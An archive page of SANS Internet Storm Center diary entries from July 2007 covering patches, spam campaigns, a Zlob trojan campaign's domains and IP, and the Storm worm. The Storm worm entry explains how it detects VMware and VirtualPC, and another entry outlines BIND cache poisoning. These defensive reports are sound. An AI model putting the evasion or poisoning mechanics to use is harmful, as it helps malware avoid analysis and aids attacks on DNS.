Diaries

Published: 2007-07-31

FireFox Update 2.0.0.6 Is Now Available

Mozilla has issued an update to the FireFox browser.  This update resolves 2 security issues, one listed as critical and one listed as moderate.

This update resolves the "Unescaped URIs passed to external programs" vulnerability.

Mozilla Foundation Security Advisory 2007-27 - MFSA 2007-27 - Critical

www.mozilla.org/security/announce/2007/mfsa2007-27.html

This update resolves the "Unescaped URIs passed to external programs" vulnerability.  This affects the way that information is passed to internal programs for handling. This can cause programs to misinterpret the information received.

 

Mozilla Foundation Security Advisory 2007-26  - MFSA 2007-26 - Moderate

www.mozilla.org/security/announce/2007/mfsa2007-26.html

This update resolves the " Privilege escalation through chrome-loaded about:blank windows".  From the Mozilla advisory: This could enable privilege escalation attacks against addons that create "about:blank" windows and populate them in certain ways (including implicit "about:blank" document creation through data: or javascript: URLs in a new window).

 

0 Comments

Published: 2007-07-31

More EMail Spam

We have received numerous emails today regarding yet another round of spam hitting the cyberwaves.  This spam is nothing more than a new twist on the pump and dump stock market emails.  It appears that these emails include a zip or RAR file for an attachment.  Once opened, these contain nothing more than the get rich quick stock market info.  There appears to be nothing malicious other than an attempt to sway the market.

0 Comments

Published: 2007-07-31

ISC Technical Difficulties

Several of our observant readers have contacted us today regarding the diary content being from May 31st.  No we are not trying to change back the hands of time (however, at my age I wouldn't mind it if we could).  We have been having technical problems with our Handlers/ISC server today and our webmaster has been diligently working on it in between teaching sessions at SansFire 2007 in Washington DC.  Dr J assures me that he has resolved the technical issues and we are back on line for the day.

0 Comments

Published: 2007-07-30

Malware Megabucks International

A reader alerted us to a bunch of malware that he had found after starting to unravel a pile of interlinked exploit pages. The exploit pages are spammed with "adult movie" kinda themes into search engines, etc, and thus most likely find enough "volunteers" who click on the links.

Domains involved are clipsforadults-dot-com and several of 9u???-free-movies-dot-cn, with the ??? standing for several letter combinations like eyd,gfo,fdo, etc. Someone's been busy registering throw-away domains.

The one bit that was of interest to us is ... that at the very end of this pile, the links try to download a "codec" off the site installobject-dot-com. The link used contains a 4-digit number, and each number, over a wide range, seems to return a slightly different binary.  Installobject-dot-Com resolves to 85.255.113.235, a known bad address range for years - see isc.sans.org/diary.html?storyid=1873

AV detection is still thin, we are trying to help it along some. The files are of the W32/Zlob family, Kaspersky calls it Trojan-Downloader.Win32.Zlob.bxt, and Trend Micro has it as TROJ_ZLOB.DND

Adult sites from China, nasty trojans from Ukraine - the Malware Megabucks International, Inc, at its best.

0 Comments

Published: 2007-07-30

ISC / DShield e-mail now with PGP signature

I started implementing PGP signed e-mails across the web site. The goal is to have most of our automatically generated e-mail PGP signed with a key reserved for these automated e-mails.

The key we will use:

pub   1024D/163EF538 2007-07-30 [expires: 2008-08-23]
Key fingerprint = 9958 2ABF 0AEE 06B2 2126 5C88 C9D8 1A62 163E F538
uid Internet Storm Center (Automatic Signing Only) <handlers@sans.org>
sub 2048g/FD87BD37 2007-07-30 [expires: 2008-08-23]
 

This key will be used ONLY for automated e-mails. Please do not use it to send us encrypted e-mail. This key, including a lot of other keys (and old keys) can be found here: https://isc.sans.org/PGPKEYS

Enjoy. And please use our contact form to report bugs. Individual handlers (if they choose to sign e-mail), will still use their individual keys.

0 Comments

Published: 2007-07-28

Blocklists - make the right choice

I have used real-time blocklists myself since a dozen or so years ago.  I've worked for companies and managed servers that have been listed on blocklists more than once unwarranted. I can't help but notice some huge changes between the granddaddy lists I did support and some of the current breed I'd stay away of.

As with all things the most negative experiences will stand out, but there's a lesson to be learned in how to detect the "bad" blocklists and how to avoid them.

The unintentional user

First, how do you know you are using a blocklist? You don't, unless you start to hunt for it. E.g. your google toolbar has a blocklist of sites it thinks are a bad idea to surf to(*). It'll warn you about a supposedly bad website you really might be willing to avoid. But how many more blocklists are you using without having intentionally configured, chosen and vetted the processes behind it?

If you use e.g. a sendmail configuration file that you didn't write, how do you know it isn't using some blocklist to tune down the volume of spam.

If you're an unintentional user, you're not in control of the choices being made and you and your peers might in the end suffer badly. So the advise is to seek out what blocklists you are using and go from the unintentional to the intentional user.

False positives - false negatives

True positives and true negatives will mostly go unnoticed but the other two can be problematic. A false positive is e.g. a blocklist for spammers that contains well behaving Internet users. Those users (might be your supplier, your customers, ...) can't communicate anymore with you, and might give up on you as you just seem to be ignoring them rudely.

The false negatives are what will prompt some into searching ever more strict rules as there is still spam sneaking through. We know that getting ever more strict measures will also increase the false positives rate dramatically.

For things like spam where the spam outnumbers the genuine messages dramatically if your address is well known, getting spam free with a blocklist is likely to cost you most if not all genuine messages as well. Basically blocking all email will guarantee you no false negatives, but it'll also guarantee all genuine messages turn out to be false positives.

Measuring false negatives is terribly easy for e.g. spam lists, while measuring false negatives is next to impossible. Just measuring how much email got blocked says nothing about it all, and if you need to read the messages in order to be able to measure the effectiveness , you might just as well deleted the spam by hand.

Criteria

Some criteria we could suggest to choose blocklists:

  • Speed of reaction: The faster (the more real-time) a list is updated, the more easier it is to deal with false positives and with false negatives.
  • Selection criteria: How are the sources added to the blocklist, based on what criteria ? How sure are the blocklist admins that the one they are listing is bad ? How sure are you they will not add yur partners, customers, suppliers and other business critical peers. Similarly how sure are you they will not list yourself (from experience: this is extremely painful)
  • Goal of the blocklist: Does the list have an agenda (hidden or not) that you might not share with them? Do they aim to have 0 false negatives without care for false positives?
  • Ease of getting unlisted: How easy is it to contact the list administration for those listed ? If it's e.g. a spam blocking list. Chances are it can't be done in email as they will be using their own blocklist. Is there 24x7 (remember the Internet is worldwide so thy need to cover all timezones) support on getting back out for those unjustly listed ?
  • Try contacting them to get unlisted: if you cannot reach them, remember what your communicating partner that got listed by accident will feel like. And while it might reflect mostly on the blocklist provider, it will also reflect on you and your organization due to your choice and implicit support of their (failing) processes.
  • Is there somebody who feels responsible enough behind it to put up out of band contact details such as phone numbers, working snail-mail addresses etc. Of course this means they'll feel exposed to the scam artists they are blocking, but it also means those being blocking without reason have a way to complain.
  • Blocking for the right reasons. E.g. some anti-spam lists are blocking with as reason the IP addresses sent unwanted TCP/IP traffic (not just unwanted email). Some might have political reasons or other things you don't want to be associated with.
  • Duration of a block: many IP addresses that get infected by bots etc. are home users on a (somewhat) dynamic IP address. Blocking sch an IP address for a long time won't help as the IP isn't fixed and the next one to come after it will get blocked unwarranted. Similarly, infected machines do eventually get cleaned up by the rightful owners. So short durations are better.
  • Granularity of the block. Unless there are clear signs of malice, most regular users will clean up intrusions and malware instead of hopping about the IP address in an address space to avoid blocklists. Hence only very bad neighborhoods should get blocked indiscriminately. Similarly "punishing" an ISP for having a single misbehaving customer will not work as the ISPs is hardly punished at all, it's the other (innocent) customers of the ISP that get hit.
    While there are people going to say they only deal with a specific country/continent and don't need anything outside, think a bit longer: none of the employees of your partners, customers, ... will ever go out of the country/continent on business or holiday and get a phone call to do something or try to make a decision on the road.
  • One practice I found to be impossible to deal with from an business point of view: was a blocklist demanding money to get unlisted. Any self-respecting business will feel this is extortion and will not give in. No matter that they send it to their charity of choice, no matter the small amount it actually is, this remains a show stopper. For you this means you'll find contacts who get listed and have no way of getting out again.
  • Do the blocklist administrators actually warn those getting listed? Since many of the evil actions a machine does is more often than not done without the knowledge of the rightful owner, a word to the ISP connecting the machine or the business hosting the machine, can in fact be a big step towards detecting the rootkitted botnet and starting the clean-up.

If your favorite blocklist fails many of these criteria, perhaps it's time to urgently switch blocklists, or move to another solution as to avoid the false positives you might not be aware of.

Sometimes just reading the FAQ wil set of so many alarms that you might choose not to use their blocklist.

If you have more criteria to suggest, feel free, we'll update the story with the best suggestions. 

(*): I've never seen a false positive on the google toolbar myself, so I'm not criticizing them, just using it as one of the examples where you or your users might have picked up a blocklist without having the intention of doing so.

--
Swa Frantzen -- NET2S

0 Comments

Published: 2007-07-28

Con-fu revisited

Next week is a very famous pair of security conferences in the US.  I imagine quite a few of our readers will be attending.  So I offer my tips on secure networking from untrusted wireless networks.  You don't want to end up on the "Wall of Shame", right?  Assuming that you trust your wireless device drivers and SSH, here are my tips (from 2005):  http://isc.sans.org/diary.html?storyid=608

Please note that you can do this a little more easily without the Squid proxy on your remote SSHD (and using the built-in SOCKS proxy of SSH).  However, if you use that approach your DNS requests still go through the local network.  If you use Squid, your DNS requests are also proxied which is benefitial.

Also note that the wireless network does seem _way_ more reliable the past two years, but it still goes down occassionally.

0 Comments

Published: 2007-07-27

Malware e-mail with Angelina Jolie temptation

Several reports today of a zip file with an executable inside.  The lure is some exciting fun with Angelina Jolie.  At this time, antivirus detection is low.

Update: Other folks are seeing the same emails, with different famous female names and subjects.  Nothing very shocking there.

0 Comments

Published: 2007-07-26

E-cards don’t like virtual environments

The biggest malware threat we’re dealing with at the moment is definitely the Storm worm. Unless your e-mail address is ultra secret, you probably received more than a couple of infamous e-card e-mails asking you to visit a strange URL address that can potentially lead to your machine being infected with the Storm worm.

While the Storm worm hasn’t brought anything really new, the authors definitely went a step further – the Storm worm’s code looks much better than a lot of malware we’ve seen. And besides that, you have a custom packer that makes analysis and detection more difficult, rootkit capabilities so it’s completely hidden, P2P botnet control and so on.

While analyzing one sample I noticed that the Storm worm tries to detect if it’s running in a virtual environment. This became pretty popular with malware writers lately. The main reason they're doing this is (presumably) to make analysis more difficult. The first step in malware analysis today is typically to run it in an isolated environment and to monitor its behavior.

By detecting virtual machines and changing the behavior, malware authors make analysis more difficult – an AV researcher either has to run the malware on physical machines, modify the virtual environment he’s using to prevent detection or manually analyze the malware. That being said, virtual environment detection is also a double edged sword for malware authors – by implementing something like this they are effectively losing certain number of potential victims which will only be higher in the future, as virtual machines are more and more popular (especially for servers).

The Storm worm tries to detect two popular virtual machine products: VMWare and Microsoft’s VirtualPC. If it detects that it’s running in one of these products it will simply reboot the machine – the machine will not be infected. So, let’s see how the Storm worm does this.

VMWare detection

Detection of VMWare

The method used above was published by Ken Kato (http://chitchat.at.infoseek.co.jp/vmware/backdoor.html) and it uses VMware’s “backdoor” I/O port. Basically, VMWare supports a magic number (0x564D5868 = “VMXh”) that has to be used with VMWare’s I/O port (0x5658 = “VX”). After the IN instruction, if the program is running in VMWare the EBX register will contain the magic number. This method makes it trivial to detect VMWare (there are many, many other ways for doing this). Of course, if you are manually debugging this you can just change the result of the CMP instruction (zero the Z flag) and the Storm worm will not detect that you’re running in VMWare.

VirtualPC detection

Detection of VirtualPC

The Storm Worm uses Elias Bachaalany’s method (http://www.codeproject.com/system/VmDetect.asp - this web site seems to be down at the moment) for VirtualPC detection. Basically this method consists of using illegal instruction opcodes. The program sets an exception handler that is called on normal CPUs when an illegal instruction is encountered. However, if you are running in VirtualPC this will not happen and the program can easily detect if this is the case (the EBX register will stay 0 if VirtualPC is running).

It will be interesting to see if malware authors will change these tactics in the future as the number of virtual machines will grow for sure. As I already wrote – virtual environment detection is a double edged sword – it makes malware analysis more difficult (it is not always easy to circumvent detection as in this case) but it also decreases the number of potential victims. It is also clear that malware authors keep improving their code and that they are keeping an eye on research fields that interest them, such as virtual machine detection.

--
Bojan

0 Comments

Published: 2007-07-25

APEWS.ORG: Please contact us

Please pardon the interruption.  If you manage the APEWS list, please contact us.

 

just a few more details. APEWS appears to use our "top sources" list http://isc.incidents.org/ipsascii.html as a blocklist. This list is an unfiltered list of sources for which we received a lot of reports. It is not supposed to be used as a blocklist as it is bound to include false positives. In addition, APEWS turns these /32 listings into /17 blocks, and they appear to violate our "Creative Commons Share-Alike License". Sadly, all other attempts to contact them have failed.

APEWS may be a useful "anti-spam" list if you do not mind losing a lot of valid e-mail as well. For example, right now, it appears to block the entire AT&T network.

0 Comments

Published: 2007-07-25

BIND Updates Available

The Internet Systems Consortium has announced updates to BIND that address CVE-2007-2926.

From their announcements:

BIND 9.4.1-P1 can be downloaded from

ftp://ftp.isc.org/isc/bind9/9.4.1-P1/bind-9.4.1-P1.tar.gz

The PGP signature of the distribution is at

ftp://ftp.isc.org/isc/bind9/9.4.1-P1/bind-9.4.1-P1.tar.gz.asc
ftp://ftp.isc.org/isc/bind9/9.4.1-P1/bind-9.4.1-P1.tar.gz.sha256.asc
ftp://ftp.isc.org/isc/bind9/9.4.1-P1/bind-9.4.1-P1.tar.gz.sha512.asc
 

BIND 9.3.4-P1 can be downloaded from

ftp://ftp.isc.org/isc/bind9/9.3.4-P1/bind-9.3.4-P1.tar.gz

The PGP signature of the distribution is at

ftp://ftp.isc.org/isc/bind9/9.3.4-P1/bind-9.3.4-P1.tar.gz.asc
ftp://ftp.isc.org/isc/bind9/9.3.4-P1/bind-9.3.4-P1.tar.gz.sha256.asc
ftp://ftp.isc.org/isc/bind9/9.3.4-P1/bind-9.3.4-P1.tar.gz.sha512.asc
 
 
BIND 9.2.8-P1 can be downloaded from

ftp://ftp.isc.org/isc/bind9/9.2.8-P1/bind-9.2.8-P1.tar.gz

The PGP signature of the distribution is at

ftp://ftp.isc.org/isc/bind9/9.2.8-P1/bind-9.2.8-P1.tar.gz.asc
ftp://ftp.isc.org/isc/bind9/9.2.8-P1/bind-9.2.8-P1.tar.gz.sha256.asc
ftp://ftp.isc.org/isc/bind9/9.2.8-P1/bind-9.2.8-P1.tar.gz.sha512.asc
 
 
BIND 9.5.0a6 can be downloaded from

ftp://ftp.isc.org/isc/bind9/9.5.0a6/bind-9.5.0a6.tar.gz

The PGP signature of the distribution is at

ftp://ftp.isc.org/isc/bind9/9.5.0a6/bind-9.5.0a6.tar.gz.asc
ftp://ftp.isc.org/isc/bind9/9.5.0a6/bind-9.5.0a6.tar.gz.sha256.asc
ftp://ftp.isc.org/isc/bind9/9.5.0a6/bind-9.5.0a6.tar.gz.sha512.asc
 
These signatures were generated with the ISC public key, which is
available at <http://www.isc.org/about/openpgp/pgpkey2006.txt>

0 Comments

Published: 2007-07-24

A Word to the Wise - SPIM Flood

We have received several reports today from people that are getting flooded with SPIM on their IM accounts.  These messages are providing a link to various web sites.  These sites all seem to point to one site www dot messenger-tips dot com.  This site purports to check your IM friends/contacts and report back to you which of them have blocked you.  All you have to do is give them your login and password information.  You also  have to agree to their terms and conditions.  Ok so we read their Terms and Conditions page and what do we find,  first

They will NOT be responsible for any misuse of the information you provide.  They also have no liability for content, views, advice or guidance because they provide a service that is for entertainment purposes only. (Huh? what entertainment). You provide them with the id and password, of course they won't store the information with anyone without your consent. (And if you believe that I have a bridge I will sell you.)  Now here is the real catch-22.  By agreeing to the terms and conditions you agree to allow them to SPIM all of your friends and contacts.  Wonderful.

I am not sure if this program installs any malware or sets up any hole in your computer for them to crawl through.  I don't have a sacrificial lamb here that I can test it with.  We have not been able to determine if it is anything more than ad-ware.  Bottom line folks, DO NOT CLICK ON LINKS. 

 

 

0 Comments

Published: 2007-07-24

Port 57886 Activity

In reviewing the Top 10 Ports today at isc.sans.org/portreport.html I noticed that there is an unusual increase in activity on isc.sans.org/port.html.

The data that is being submitted indicates that we have gone from less than 100 targets a day to over 50,000 .  We would like to know what you are seeing.  Take a look at your network to determine if you are seeing this activity and let us know. It would be helpful if we could get some data captures so that we can take a look at the data and see what is generating the traffic to port 57886.  You can upload the captures to our website at isc.sans.org/contact.html

 

0 Comments

Published: 2007-07-24

BIND cache poisoning vulnerability details released

Amit Klein wrote about a paper he just released with details about a BIND 9 cache poisoning issue. This is one of the problems addressed by the latest version of BIND 9.

The very brief summary: BIND prior to version 9.4.1-P1 did not use a strong algorithm to create DNS transaction IDs. As a result, one can derive the next transaction ID BIND will use by knowning the last few transaction IDs. In this case, up to 15 queries are used.

Once the attacker knows the "state" of the targets BIND install, it is possible to forge a response. DNS uses UDP by default. Each query sent by the DNS server includes a random transaction ID. The server responding to the query will include this transaction ID so the querying DNS server knows what query is answered by this particular response. BIND always uses the same source port for its queries.

The attack appears to be quite feasible. Probably the main difficulty will be to get the spoofed packet routed. But unless the attackers network implements strict egress filtering, this is very much a feasible attack. Best to patch your BIND server soon.

CVE: CVE-2007-2926
Versions affected:   BIND 9.0 (all versions)
BIND 9.1 (all versions)
BIND 9.2.0, 9.2.1, 9.2.2, 9.2.3, 9.2.4, 9.2.5, 9.2.6, 9.2.7, 9.2.8
BIND 9.3.0, 9.3.1, 9.3.2, 9.3.3, 9.3.4
BIND 9.4.0, 9.4.1
BIND 9.5.0a1, 9.5.0a2, 9.5.0a3, 9.5.0a4, 9.5.0a5

Not vulnerable: BIND 9.2.8-P1, BIND 9.3.4-P1, BIND 9.4.1-P1 or BIND 9.5.0a6

For details, see www.trusteer.com/docs/bind9dns.html

 ISC.org link: www.isc.org/index.pl?/sw/bind/bind-security.php

0 Comments

Published: 2007-07-23

Mailbag

Numerous readers have contacted us in in the past hour to let us know that ...

Thanks to all who reported these.

0 Comments

Published: 2007-07-23

Antivirus: The emperor is naked

Over the weekend, I read a report by an anti-virus firm about the "discovery" of a malware serving host which creates a new, unique malware binary "on the fly" for every exploited PC connecting to retrieve it. As if this were anything new, really.  But rather than to draw the obvious conclusion from this discovery - namely that the antivirus approach of the last 20 years, which is based on the assumption that you can keep up with creating "patterns" for all bad things out there, has completely outlived its usefulness - the article went on to extol the virtues of new "behavioural" virus defense software.

Time is overdue to radically change tactics on the malware defense side - but why doesn't anyone do it? Is it because the Anti-Virus vendors, reveling in their plum revenue stream of "update licenses", do not really see any need to change ? Is it because the operating system vendors have their eyes set on this same (for them: additional) revenue stream, and don't want to dry it up by making a few changes to the OS itself ?

At least for the corporate environment, the "solution" would be kinda obvious. Large firms have standardized their workplace computers, and use automated software distribution tools to patch, update and deploy software on client PCs. Frequently, the distribution mechanism used is even from the same vendor as the operating system on the workstations. All that's needed to make life a misery for malware in such an environment is a component which enforces that workstations only load/run executable code deployed to the workstation via the corporate software distribution system. Wouldn't this be an useful application of all the DRM code for a change ?

Yes, I'm aware that this still leaves a number of attack points and injection techniques uncovered. And yes, this would not completely remove the need for anti virus software. But it sure would be a huge step in the right direction.

I think it's time to stop pretending that the emperor is wearing clothes.

0 Comments

Published: 2007-07-22

Recent change in Stock-Spam Tactics (PDF and excel)

It started nearly a month ago, a shift from image-based spam to spams containing PDF files.

I'm sure that you've seen these in your mailbox, the shift over to PDF was effective in evading spam-filters.  You have also likely noted their shift in tactics from a simple text message in the PDF over to encoded images in the PDF (to foil pdf2text-like tools, I presume.)

I would have thought that this shift would have had an impact on the efficacy of the scheme.  "Certainly people won't open unsolicited PDF files," I thought.  Based on the number of submissions past month asking if these were PDF-exploit attempts I felt that this shift would have had some impact on the success of this type of scheme.

In January, I performed an unscientific experiment monitoring the impact of Pump and Dump schemes on the targeted companies.  My hypothesis was that Pump and Dump schemes have an overall negative impact on the company who's symbol was targeted.  I was unable to prove this hypothesis, the stock price quickly returns to normal three to four weeks after an event (in the population of stocks that I tracked in the first quarter of 2007, that is.)

This morning I did a bit of comparison with symbols identified in the few PDF files that I had left in my mailbox.  Looking at this small sample it seems that these schemes are just as effective in manipulating the stock price as text-only and image-based spam messages.

The consequence of this is that there exists a large population of people with a fair amount of assets in the stock market that willingly open up unsolicited PDF files.  This makes for a concerning scenario when a arbitrary-code-execution vulnerability is identified in popular PDF readers.

A reader submitted a report that they were receiving a large number of spam messages consisting of an Excel file.  Examination of this file showed that it contained a Pump and Dump message.  This could serve as an indicator of another shift if tactics.  The VERY interesting part is that the formatting of this Excel file is extremely similar to the first PDF version reported by Maarten.  This group appears to target German stock market.  I look forward to US penny-stock schemes to employ this technique shortly.  I'm similarly concerned about the number of people who will open unsolicited Excel files too.

0 Comments

Published: 2007-07-20

Web is the way to go?

We have all seen the recent web related incidents such as Mpack that leverages compromised web sites. These tactics are gaining popularity in malware distribution. Web technologies have been advancing at sonic speed everyday, new technologies such as Web 2.0 mashup are getting attention from everybody. If not carefully deployed, these technologies will bite us back.

Some of the traditional (old school) security folks still thinks, if I patch all the vulnerabilities according to advisories released by the vendor, I would be safe. As we get more and more 0-day vulns with OSes and related software packages, this practice not acceptable anymore. On the web application front, this is totally unsafe. If you developed your own web application, no vendor will knock on your door to get the application fixed.

Some people may like to think the custom code written would be hard to mass-exploit (using a worm) and therefore unlikely to be attacked. The truth is - scanning for vulnerability (at least the common ones) is not difficult at all. Use XSS Assistant as example, it leverages Greasemonkey which is an add-on to Firefox, as you are surfing, you can click a few times and it will be able to tell you whether a site is vulnerable to Cross Site Scripting. Locating the vulnerability may be the easy part but exploiting it isn't hard either, there is exploitation framework like BeEF that can assist in creating damaging exploits. And that's just for XSS only, the other web related vulnerabilities are all getting their share of tools to ease attack process.

A few persistent people might still think web site compromised, no big deal, just web site getting defaced.... Wrong! There is a whole lot more than that when a web site get compromised, deploying malware distribution point like Mpack is one possibility but it could easily cause a serious threat to the overall network security as well. SQL injection, in its more serious form can easily get binaries and executables onto the database server and start running malicious code, how does running nmap from your database server sound to you? If that is all too theoretical to you. Take a look at these reverse shell designed to run on web server yielding a command shell back to the attacker. Once the attacker can upload the code or remotely include those code into the running web applications, they can get a command shell on your web server.

The reverse shell technique is a lot like the traditional infrastructure type of attack where an initial exploit is used to get a shell back to the attacker. The major changes here is web applications are used as the medium instead of OS or other software packages. If your application security practice is not as good as some of the large software manufacturers, it might be cause of concern.

Does your current incident handling plan include scenarios of compromised web applications? If not, I suggest you look at it seriously.

If you want to learn more about web attack techniques, SANS offers  Web Application Security Workshop, Breaking Web Applications and AJAX and Web Services Security Overview.

 

0 Comments

Published: 2007-07-19

Old Vulnerabilities Can Still Haunt You

Andrew writes in to say ..

"It just goes to show that old vulnerabilities can still be effective. I recently ran across a site that our IDS detected via the ANI exploit.

http://ww.xx.yyy.zz    /oth/ms07-017.ani

http://ww.xx.yyy.zz    /oth/ms07-017.php

One of our machines accessed this site and got exploited, but they had the MS07-017 patch. Very strange. After de-obfuscating the javascript to see what exploits it uses, it turns out the site goes after MS03-011, MS06-014 and MS07-017. The system was patched for the two newer exploits, but not for the old Microsoft JVM vulnerability.

To make things worse, the site drops ntos.exe, which contains rootkit functionality. At least the binary is fairly well detected by AV vendors.

Depending on how security savvy your organization is, legacy issues can slip by for years.
"

If you think you're patched to current, how do you know for sure?

An occasional scan (using MBSA for example) will show you any missing patches.  In a perfect world, every system would be able to always be patched to current but if you are one of the people who can't deploy certain patches because it will break critical business functionality, these reports will be the start of the paper trail you will want for your audits showing why they can't be patched.

0 Comments

Published: 2007-07-19

Microsoft Security Contact Pages

In an earlier diary, we included a link to Microsoft's security web site that did not work.  Based on input from our readers we updated the link to one that seemed to work.  Microsoft told us today that there are two more URLs they would prefer that you use:

For home users:  http://support.microsoft.com/securityhome

For IT professionals:  http://support.microsoft.com/gp/securityitpro

In both cases, on right hand side there is a phone icon.  Under it is the "select your region" link (if the region is wrong).  For each region it links to the proper phone numbers for that region.

Marcus H. Sachs
Director, SANS Internet Storm Center

0 Comments

Published: 2007-07-18

Security Update for Firefox: 2.0.0.5

The latest revision to Firefox 2 has been released (2.0.0.5).  It fixes a handful of random announces but also does have a security update or two in there (one is a remote code execution).  Firefox uses should upgrade when convenient.  As a reminder, Firefox 1.5 is no longer supported (since May).  If you haven't upgraded to Firefox 2, you should think about it.

--

John Bambenek / bambenek [at] gmail {dot} com
University of Illinois at Urbana-Champaign

0 Comments

Published: 2007-07-18

Tragedy phishing scam

As many of you may be aware, yesterday happened a huge tragedy in Brazil, with an Airplane crash, that probably killed more than 200 persons. (Full story here)

As always, the miscreants will start to make their rounds, so we expect for the next hours, phishing scams with links to 'videos and photos' of the accident, which will lead to malicious software/webpages. So our advice is to pay attention and avoid this kind of emails.

--------------------------------------------------------------------------

Handler: Pedro Bueno ( pbueno //&&// isc. sans. org )

0 Comments

Published: 2007-07-18

Oracle Quarterly Critical Patch Update

Oracle released its quarterly Critical Patch Update today. This quarterly update contains 45 new security fixes that range across many of their products.   The ISC strongly recommends that these updates be applied in a timely manner as the risks posed by attackers compromising sensitive data contained in your database products.

 

For more information on the products and versions affected, please see the Oracle Critical Patch Update website.

0 Comments

Published: 2007-07-18

New Version of FireFox

Earlier today, Mozilla Firefox 2.0.0.5 was released which has a number of bug fixes including a couple of privacy related bugs and a few security related ones.

Mozilla's Forum show many of the details of these fixes for those that would like to peruse until the release notes are updated.  You can download the newest version from mozilla.com or through its automated update facility.

0 Comments

Published: 2007-07-17

Couple ISC site updates

The page which allows you for new diary notifications was broken and is now fixed again (see http://isc.sans.org/notify.html ).

A couple weeks ago I added AS reports. They are still being tested. Let me know if you have feedback. (see http://isc.sans.org/as.html )

We are planning in the not to distant future to do a test of our "infocon" system. This is just a pre-pre notification and here is the overall plan I am thinking about right now:

  1. publish a story with details about the test, a few days in advance.
  2. publish a second diary story with details about the test, one hour before the test.
  3. change the infocon. I am thinking about using the suffix "test" in our infocon.txt ( isc.sans.org/infocon.txt ) file.
  4. update the second story once all is back to normal.

So if you are triggering any notifications, be aware that this may happen. I will run the test around noon EDT. This is about the time when most of our readers are awake (Europe + US). Its probably better to do this during business hours then late at night. No need to wake up anybody with a pager alert.

 

 

0 Comments

Published: 2007-07-17

Reporting firewall logs

We got a couple of users forwarding firewall logs to the handlers\at/sans.org e-mail address. While we appreciate logs, malware and other reports like it, please don't send automated log reports to handlers\at/sans.org. If you send logs, include some detail why you consider them unusual.

Please use DShield for automated log reporting (see http://www.dshield.org/howto.html ). Our handlers have access to the DShield database and regularly check it for unusual activity.

Thanks!

 

0 Comments

Published: 2007-07-16

Symantec False-Positive on Filezilla, NASA World Wind

It appears that Symantec's anti-virus definitions (July 15th, rev 2) had a false positive on Filezilla and NASA World Wind, detecting them as Adware.cpush.  The definition was fixed in the July 16th release.  This isn't the first or last time false positives have shown up with anti-virus updates.  As more and more malware gets developed and deployment of said malware gets quicker, the strain on AV vendors to get definitions out quickly is intense.  This makes it difficult to test all software, especially the more esoteric variety.  Test longer and allow more exploitation or get the definition out fast and possibly have false-positives or negatives?  Not an easy question to answer (unless you tier definitions and customize updates so people can choose "stable" rules, "bleeding edge" rules, etc).

However, this leads to an interesting discussion.  Could hackers make their malware such that the signatures tend to match safe files?  This is already done in a sense with malware in the attempt to make the software appear as legitimate as possible on the network, it also tries to avoid heuristic detection.  However, for typical signature detection this is not easy, it takes more than mindless polymorphism.  However, the incentive for malware writers is for their malware to stay undetected for as long as possible.  That means more targetting to avoid the honeynets, more subtlety to avoid network detection, and making the executables subtle to avoid AV software.  Manipulating malware to maximize false-positives could be an entertaining (and certainly painful) way to wreak havoc.  Some basic research exists on this theory already, though nothing ready for market. 

 

(Update: It appears a bunch of other software was caught up in this, Winamp, NSIS stuff, etc, however the latest definitions seem to be fine with that software as well)

---

John Bambenek / bambenek (at) gmail (dot) com
University of Illinois

0 Comments

Published: 2007-07-15

Microsoft Patch support not Free?

We got reactions to some of our previous stories that some of the patch support relating to the recently released patches was not being offered for free in reality.  We are being assured by our Microsoft contacts that it is indeed intended to be free, and that they are willing to work with us to find out what went wrong.

So if you want to participate in a little study together with Microsoft, let us know what you tried that they (tried to) make you pay for and add in your contact details such as telephone numbers to be shared privately with our Microsoft contacts.

More anonymous reactions can go to the new poll, but we're looking for a few cases that are usable to find out where it goes wrong.

--
Swa Frantzen -- NET2S

0 Comments

Published: 2007-07-13

Sunbelt Software Releases Patch for Ninja Email

Sunbelt Software has announced the availability of a patch to fix the problems that have occurred with the Ninja Email Software after installation of MS07-040 patch for .NET.   For more information about the problems with Ninja and to download the patch see:

sunbeltblog.blogspot.com/2007/07/sunbelt-developers-work-at-speed-of.html

0 Comments

Published: 2007-07-13

Symantec Backup Exec for Windows Server

An advisory has been issued by Symantec for their Backup Exec product.  According to the advisory a vulnerability exists that may result in an  RPC Interface Heap Overflow, Denial of Service on versions 10.x and 11.0 for Windows Servers. 

seer.entsupport.symantec.com/docs/289731.htm

The advisory indicates that hotfixes are available at:  seer.entsupport.symantec.com/docs/289283.htm

Common Vulnerabilities and Exposures (CVE) initiative has assigned CVE Candidate CVE-2007-3509 to this issue. This issue is a candidate for inclusion in the CVE list  cve.mitre.org , which standardizes names for security problems.

In order to fully execute this vulnerability the user must have administrative privileges.  Again another good reason to restrict user access whenever possible.

 

There is also an advisory from Secunia containing information about 2 vulnerabilities that exist in various Symantec products including  Internet Security and Brightmail.  Again to fully execute the user must have administrative privileges.

secunia.com/advisories/26053/

 

 

 

0 Comments

Published: 2007-07-13

Java Run Time Advisory Issued

According to an article on line at ZDNet there is yet another potential problem with Java. 

news.zdnet.com/2100-1009_22-6196493.html

 

Australia's Computer Emergency Response Team analyst, Robert Lowe, warned that anyone using the Java Runtime Environment or Java Development Kit is at risk.

www.auscert.org.au/render.html

This flaw may have an impact on PDA's and mobile phones as well as PC's.  Because Java is browser independent it has potential to impact many, many devices.  It is recommended that you patch all java devices as soon as possible.

 

 

0 Comments

Published: 2007-07-13

Strange Round of EMails

We have received a number of reports from our readers indicating that they are receiving a large amount of Pump and Dump spam that contains no subject or body text.  The emails do however contain attachments that have a .dat extension.  Upon further review of the attachments it appears that they are failed attempts at creating and sending a .pdf file. 

The attachments are the typical pharmacy scam spam.  It is recommended that you just delete the emails.  You may want to think about adding the .dat to your banned file extensions in your anti-virus programs at least until this round of spam has ended.

 NOTE:  Just a reminder, there are some applications that use the .dat extension (Blackberry registration, Exchange servers) on files for various reasons.  Be aware that if you block the .dat attachment it may also block valid emails.  At this point the .dat attachment is not malicious so you may just want to inform your users of the emails and tell them to delete them (don't open the attachment).

Thanks to our many readers that have offered insight into the uses for the .dat files.

 

 

 

0 Comments

Published: 2007-07-13

MS07-036 Revised

This patch was initially only for office on windows,  however some MAC users of office may have noticed a patch being pushed down to them as well.   Microsoft has revised the bulletin and detection logic

MS07-036 Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (936542)

" Summary: The bulletin was updated to include Microsoft Office 2004 for Mac and to indicate that the File Manifest information has been updated for Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007.  The significance here is around the fact that when the bulletin was released there was no mention of Mac being affected despite the fact that bits were published to address the issue for them."

Mark - Shearwater

0 Comments

